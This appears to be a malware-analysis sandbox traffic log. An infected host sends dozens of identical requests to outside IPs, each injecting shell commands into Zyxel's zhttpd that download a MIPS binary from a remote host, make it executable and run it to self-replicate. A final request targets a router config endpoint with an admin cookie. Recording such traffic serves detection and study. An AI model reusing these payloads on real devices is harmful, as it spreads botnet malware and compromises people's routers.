                                                Jan 12, 2024 18:24:31.742082119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3470192.168.2.1334480158.220.56.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.742111921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3471192.168.2.1350454207.170.134.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.742175102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3472192.168.2.1341242125.83.229.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.742185116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3473192.168.2.1354670146.218.153.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.742225885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3474192.168.2.135201246.130.38.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.742338896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3475192.168.2.1357652206.160.31.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.742364883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3476192.168.2.133348047.93.10.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.742436886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3477192.168.2.1353508199.222.153.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.742474079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3478192.168.2.135769623.51.153.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.742503881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3479192.168.2.1334516160.176.164.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.742552042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3480192.168.2.1351518190.154.241.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.742583036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3481192.168.2.1338022115.237.105.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.742609978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3482192.168.2.133334212.88.129.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.742670059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3483192.168.2.1342780221.23.224.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.742691040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3484192.168.2.1342544157.118.238.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.742732048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3485192.168.2.1341556111.49.80.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.742782116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3486192.168.2.1342788156.226.207.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.742826939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3487192.168.2.1348040185.38.157.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.742875099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3488192.168.2.135161649.169.149.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.742901087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3489192.168.2.1360250222.237.73.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.742954969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3490192.168.2.133616818.77.173.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.742978096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3491192.168.2.1338194113.228.113.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743031979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3492192.168.2.1341362201.31.129.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743067026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3493192.168.2.133339032.146.165.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743103981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3494192.168.2.133407873.115.103.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743144035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3495192.168.2.134149250.184.212.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743186951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3496192.168.2.1343328120.191.133.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743216038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3497192.168.2.1336698128.141.25.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743252993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3498192.168.2.134390048.151.176.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743298054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3499192.168.2.135510459.24.54.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743341923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3500192.168.2.134090825.22.148.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743397951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3501192.168.2.1357538116.226.137.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743433952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3502192.168.2.135036059.216.115.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743485928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3503192.168.2.1346144151.65.187.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743518114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3504192.168.2.1345856117.229.249.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743568897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3505192.168.2.135876494.108.202.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743611097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3506192.168.2.1340848130.218.146.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743658066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3507192.168.2.1356956210.252.43.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743685961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3508192.168.2.1358406103.255.184.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743741989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3509192.168.2.1335668203.154.2.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743779898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3510192.168.2.133388212.174.116.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743798971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3511192.168.2.1359498184.34.76.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743849993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3512192.168.2.134411670.161.236.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743866920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3513192.168.2.133486214.71.98.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743927002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3514192.168.2.1350614200.187.48.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743954897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3515192.168.2.1348352105.133.66.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.743992090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3516192.168.2.1352480122.189.177.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.744031906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3517192.168.2.135646465.125.37.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.744062901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3518192.168.2.1333338130.234.34.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.744116068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3519192.168.2.133419844.136.222.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.744143963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3520192.168.2.134055269.59.63.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.744173050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3521192.168.2.1338382201.178.97.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.744210005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3522192.168.2.1335466187.7.122.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.744240046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3523192.168.2.1359218110.181.175.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.744261026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3524192.168.2.135716625.224.72.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.744335890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3525192.168.2.134459062.114.138.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.744380951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3526192.168.2.13409601.203.133.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.744431019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3527192.168.2.1333356152.240.14.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.747814894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3528192.168.2.135788071.216.198.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.747855902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3529192.168.2.13594264.127.217.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.747875929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3530192.168.2.1354108125.93.25.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.747952938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3531192.168.2.134238217.167.245.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.747958899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3532192.168.2.135384064.226.184.2308080
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.994739056 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
